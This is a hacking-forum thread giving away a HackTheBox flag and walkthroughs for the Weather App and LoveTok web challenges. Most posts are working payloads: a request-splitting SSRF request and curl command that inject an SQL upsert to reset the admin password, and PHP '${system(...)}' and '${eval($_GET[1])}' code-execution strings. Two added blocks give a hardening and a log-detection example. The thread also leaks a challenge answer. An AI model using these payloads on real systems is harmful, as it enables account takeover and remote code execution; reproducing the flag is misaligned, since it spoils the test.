TUTORIAL Weather App Web Challenge free flag and little walkthrough
by lucifer113 - February 22, 2021 at 12:42 PM
#1
flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send this POST:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!

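The request above only works because, as the payload implies, the `city` value is copied into a request the server makes to `endpoint`, and the `/register` password lands inside an INSERT built by string concatenation. The odd characters in the city value (Ġ, Ċ, Ħ) are code points above 0xFF; an outbound HTTP client that keeps only the low byte turns them into space, newline and `&`, which is what splits one request into three. As an added example that is not from this thread or from the challenge's own code, here is what a hardened handler looks like: an allowlist check on `city` and `endpoint` that refuses anything outside printable ASCII, and a parameterised registration statement shown beside the concatenated one it replaces. The function names, the `users` table, and the assumption that the backend is a Node.js service are all assumptions made for the example.

```javascript
// Added hardening example (not the challenge's or any poster's code).
// Assumes a Node.js backend with an Express-style handler that forwards
// `city` to the service named in `endpoint`, and a SQLite-style `users`
// table behind /register. All names below are hypothetical.

// Strict allowlists: printable ASCII only, one line only.
const CITY_RE = /^[A-Za-z .'-]{1,64}$/;
const ENDPOINT_RE = /^(?:[A-Za-z0-9-]+\.)*[A-Za-z0-9-]+:\d{1,5}$/;

// The thread's payload uses code points above 0xFF (U+0120, U+010A, U+0126)
// that a client keeping only the low byte turns into ' ', '\n' and '&'.
// Refusing anything outside the allowlist removes that whole class.
function isSafeCity(city) {
  return typeof city === 'string' && CITY_RE.test(city);
}

function isSafeEndpoint(endpoint) {
  return typeof endpoint === 'string' && ENDPOINT_RE.test(endpoint);
}

// Builds the path of the outbound request and refuses to emit a second line.
function buildOutboundPath(city) {
  if (!isSafeCity(city)) {
    throw new Error('city rejected by allowlist');
  }
  const path = '/?city=' + encodeURIComponent(city);
  // Defence in depth: encodeURIComponent never emits CR/LF, but check anyway.
  if (/[\r\n]/.test(path)) {
    throw new Error('CR/LF in outbound path');
  }
  return path;
}

// Vulnerable shape: values concatenated into SQL text. A password such as
//   admin') ON CONFLICT(username) DO UPDATE SET password='pass' --
// closes the literal and appends an upsert, which is what the walkthrough does.
function registerSqlUnsafe(username, password) {
  return `INSERT INTO users (username, password) VALUES ('${username}', '${password}')`;
}

// Hardened shape: placeholders. The SQL text is constant; the driver binds
// the values, so the user's input can never change the statement.
function registerSqlSafe(username, password) {
  return {
    sql: 'INSERT INTO users (username, password) VALUES (?, ?)',
    params: [username, password],
  };
}

// Constructed sample values mirroring the thread's payload (not real traffic).
const SMUGGLED_CITY = '\u0120HTTP/1.1\u010AHost:\u0120127.0.0.1:80';
const INJECTED_PASSWORD =
  "admin') ON CONFLICT(username) DO UPDATE SET password='pass' --";

// Stand-alone demonstration: the allowlist rejects the payload, and only the
// concatenated statement ends up carrying the ON CONFLICT clause.
function demo() {
  return {
    cityAccepted: isSafeCity('New York'),        // true
    payloadAccepted: isSafeCity(SMUGGLED_CITY),  // false
    unsafeSql: registerSqlUnsafe('admin', INJECTED_PASSWORD),
    safeSql: registerSqlSafe('admin', INJECTED_PASSWORD).sql,
  };
}

console.log(demo());
```

The allowlist is deliberately narrower than "reject CR and LF": the point of the payload is that the dangerous bytes are not present in the JavaScript string at all and only appear after the client encodes it, so validating for the characters you expect is the check that actually holds.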
#2
BTW, does anybody have LoveTok's writeup? I would really appreciate it, please help!
#3
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, does anybody have LoveTok's writeup? I would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so no one can complain, I guess lol

LoveTok is easy: it puts whatever you give it through an eval, so you can just pass it something in ${}, which will execute whatever is between the brackets as PHP code. So you can just do something like ${phpinfo()} to confirm you can execute code, or ${system("ls -lah /")} to list all files in / and see what the flag file is called.
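Both injection shapes in this thread, the `${...}` PHP interpolation described in the post above (including the `${eval($_GET[1])}` variant that appears later) and the `') ON CONFLICT ... DO UPDATE` upsert from the Weather App request in the first post, leave a recognisable trace in request logs. As an added detection example that is not from any poster here, the block below runs two rules over constructed log lines; the log format (one "METHOD PATH BODY" line per request, as a proxy that records decoded bodies might emit) and the rule names are assumptions for the example.

```javascript
// Added detection example (not from any poster in this thread). Scans
// constructed request-log lines for the two injection shapes discussed here:
// PHP string-interpolation code execution via ${...} and an upsert-style
// SQL injection in a form body. The log format is hypothetical: a proxy
// that records "METHOD PATH BODY" per line, with "-" for an empty body.
const SAMPLE_LOG = [
  'GET /?format=${phpinfo()} -',
  'GET /?format=%24%7Beval%28%24_GET%5B1%5D%29%7D&1=system%28%22ls%20-la%20/%22%29 -',
  'GET /?format=r -',
  'POST /register username=admin&password=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-',
];

const RULES = [
  // "${" ... "(" : a call inside a PHP ${...} interpolation, e.g. ${phpinfo()} or ${eval($_GET[1])}
  { name: 'php-interpolation-exec', re: /\$\{[^}]*\(/ },
  // "') ON CONFLICT" : a closed string literal followed by an upsert clause
  { name: 'sql-upsert-injection', re: /'\)\s*ON\s+CONFLICT/i },
];

// Decode form/URL encoding so %24%7B and "+" are seen as "${" and space.
// A malformed %-sequence makes decodeURIComponent throw; fall back to raw text.
function decodeLoosely(text) {
  try {
    return decodeURIComponent(text.replace(/\+/g, ' '));
  } catch (e) {
    return text;
  }
}

// Returns the names of every rule that fires on one log line.
function scanLine(line) {
  const decoded = decodeLoosely(line);
  return RULES.filter((rule) => rule.re.test(decoded)).map((rule) => rule.name);
}

// Returns [{ line, hits }] for the lines that triggered at least one rule.
function scanLog(lines) {
  return lines
    .map((text, i) => ({ line: i + 1, hits: scanLine(text) }))
    .filter((entry) => entry.hits.length > 0);
}

console.log(scanLog(SAMPLE_LOG));
```

Decoding before matching is the part that matters: the second sample line is the same `${eval(...)}` payload fully percent-encoded, and a rule applied to the raw line would miss it.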
#4
Thank you for sharing!!
#5
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, does anybody have LoveTok's writeup? I would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so no one can complain, I guess lol

LoveTok is easy: it puts whatever you give it through an eval, so you can just pass it something in ${}, which will execute whatever is between the brackets as PHP code. So you can just do something like ${phpinfo()} to confirm you can execute code, or ${system("ls -lah /")} to list all files in / and see what the flag file is called.
thanks bro, it works!

(February 22, 2021 at 04:41 PM)shadowhunter1337 Wrote: `
curl 'http://ip:port/api/weather' -H 'Connection: keep-alive' -H 'User-Agent: cGFzcw==' -H 'Content-Type: application/json' -H 'Accept: */*' --data-binary '{"endpoint":"127.0.0.1:80","city":"ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ108ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?","country":"register"}' --compressed --insecure
`
nicely done, bro, awesome!
#6
weird.... ${phpinfo()} is working for me, even ${system(ls)} is working, but if I put a space char, it doesn't work. This is not working for me: ${system("ls -lah /")} ¿?
#7
(March 02, 2021 at 08:57 AM)siracuso Wrote: weird.... ${phpinfo()} is working for me, even ${system(ls)} is working, but if I put a space char, it doesn't work. This is not working for me: ${system("ls -lah /")} ¿?
just try this: ${eval($_GET[1])}&1=system("ls -la /");
#8
hmmm.... very smart. Nice idea. It works! thank you.
#9
(February 22, 2021 at 12:42 PM)lucifer113 Wrote: flag:

HTB{w3lc0m3_t0_th3_p1p3_dr34m}

walkthrough:

just send this POST:

POST /api/weather HTTP/1.1
Host: ip:port
User-Agent: cGFzcw==
Content-Type: application/x-www-form-urlencoded
Content-Length: 462
Connection: close

endpoint=127.0.0.1:80&city=ĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊConnection:Ġkeep-aliveĊĊĊPOSTĠ/registerĠHTTP/1.1ĊHost:Ġ127.0.0.1:80ĊContent-Type:Ġapplication/x-www-form-urlencodedĊUser-Agent:ĠMozilla/5.0Ġ(X11;ĠLinuxĠx86_64;Ġrv:85.0)ĠGecko/20100101ĠFirefox/85.0ĊConnection:Ġkeep-aliveĊContent-Length:Ġ110ĊĊusername=adminĦpassword=admin%27)%20ON%20CONFLICT(username)%20DO%20UPDATE%20SET%20password=%27pass%27%20--+-ĊĊGETĠ/?&country=register


then go to http://ip:port/login and enter "admin:pass"

you will get the flag, enjoy!


Gives me an error:

{"message":"Missing parameters"}
#10
Good writeup. First command:
nc <ip> <port>
then POST /api/weather HTTP/1.1 ... etc.
#11
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, does anybody have LoveTok's writeup? I would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so no one can complain, I guess lol

LoveTok is easy: it puts whatever you give it through an eval, so you can just pass it something in ${}, which will execute whatever is between the brackets as PHP code. So you can just do something like ${phpinfo()} to confirm you can execute code, or ${system("ls -lah /")} to list all files in / and see what the flag file is called.

Where do I have to add '${phpinfo()}' to receive the flag?
#12
(March 19, 2021 at 09:30 AM)Dark_Arwen Wrote:
(February 22, 2021 at 05:27 PM)z3uz Wrote:
(February 22, 2021 at 03:52 PM)lucifer113 Wrote: BTW, does anybody have LoveTok's writeup? I would really appreciate it, please help!

not exactly a walkthrough, but at least it's free so no one can complain, I guess lol

LoveTok is easy: it puts whatever you give it through an eval, so you can just pass it something in ${}, which will execute whatever is between the brackets as PHP code. So you can just do something like ${phpinfo()} to confirm you can execute code, or ${system("ls -lah /")} to list all files in / and see what the flag file is called.

Where do I have to add '${phpinfo()}' to receive the flag?

the easiest step is left as an exercise to the reader lol
